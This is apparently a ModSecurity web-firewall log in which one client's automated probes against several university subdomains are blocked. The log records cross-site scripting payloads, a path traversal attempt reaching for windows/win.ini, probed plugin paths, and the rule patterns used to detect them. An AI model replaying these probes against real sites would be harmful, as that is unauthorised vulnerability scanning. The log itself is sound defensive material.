[Tue Aug 29 11:56:27.125117 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAArHa1wAAAAJ"]
[Tue Aug 29 11:56:27.125282 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAAq3a@cAAAAI"]
[Tue Aug 29 11:56:27.125399 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAAq5@Q8AAAAK"]
[Tue Aug 29 11:56:27.772889 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16e8Co-f0AAApHRoUAAAAP"]
[Tue Aug 29 11:56:27.776820 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAArMmqQAAAAf"]
[Tue Aug 29 11:56:29.736835 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fcCo-f0AAArLLekAAAAb"]
[Tue Aug 29 11:56:29.839066 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fcCo-f0AAAocyi4AAAAR"]
[Tue Aug 29 11:56:30.067533 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fsCo-f0AAArB104AAAAV"]
[Tue Aug 29 11:56:30.086741 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fsCo-f0AAArB108AAAAV"]
[Tue Aug 29 11:56:30.132634 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fsCo-f0AAArMmq0AAAAf"]
[Tue Aug 29 11:56:30.535097 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fsCo-f0AAAocyjQAAAAR"]
[Tue Aug 29 11:56:30.560246 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAqeFo0AAAAx"]
[Tue Aug 29 11:56:30.563538 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAoAlB4AAAAC"]
[Tue Aug 29 11:56:30.563564 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAArB11QAAAAV"]
[Tue Aug 29 11:56:30.589379 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAocyjYAAAAR"]
[Tue Aug 29 11:56:30.608695 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAq@slUAAAAM"]
[Tue Aug 29 11:56:30.609643 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAArLLfMAAAAb"]
[Tue Aug 29 11:56:30.628770 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAArB11cAAAAV"]
[Tue Aug 29 11:56:30.629716 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAocyjgAAAAR"]
[Tue Aug 29 11:56:30.630371 2023] [:error] [pid 2762] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAArKv24AAAAa"]
[Tue Aug 29 11:56:30.631271 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAq5@R0AAAAK"]
[Tue Aug 29 11:56:31.795408 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16f8Co-f0AAAqeFpQAAAAx"]
[Tue Aug 29 11:56:31.853381 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16f8Co-f0AAAq5@SIAAAAK"]
[Tue Aug 29 11:56:32.967837 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_4c417fa93f05a6c1142d086a2b81f21f44682fb3"): Internal error [hostname "informatika.unla.ac.id"] [uri "/embed.js"] [unique_id "ZO16gMCo-f0AAArHa3gAAAAJ"]
[Tue Aug 29 11:56:32.969858 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_abfa90f666903dc891da995b2ce41b245c240c54"): Internal error [hostname "www.unla.ac.id"] [uri "/onlinePreview"] [unique_id "ZO16gMCo-f0AAAoAlCgAAAAC"]
[Tue Aug 29 11:56:33.600141 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAolK3AAAAAe"]
[Tue Aug 29 11:56:33.600756 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAqsV@YAAAAB"]
[Tue Aug 29 11:56:33.760209 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAAqSw88AAAAN"]
[Tue Aug 29 11:56:33.761034 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAArB12UAAAAV"]
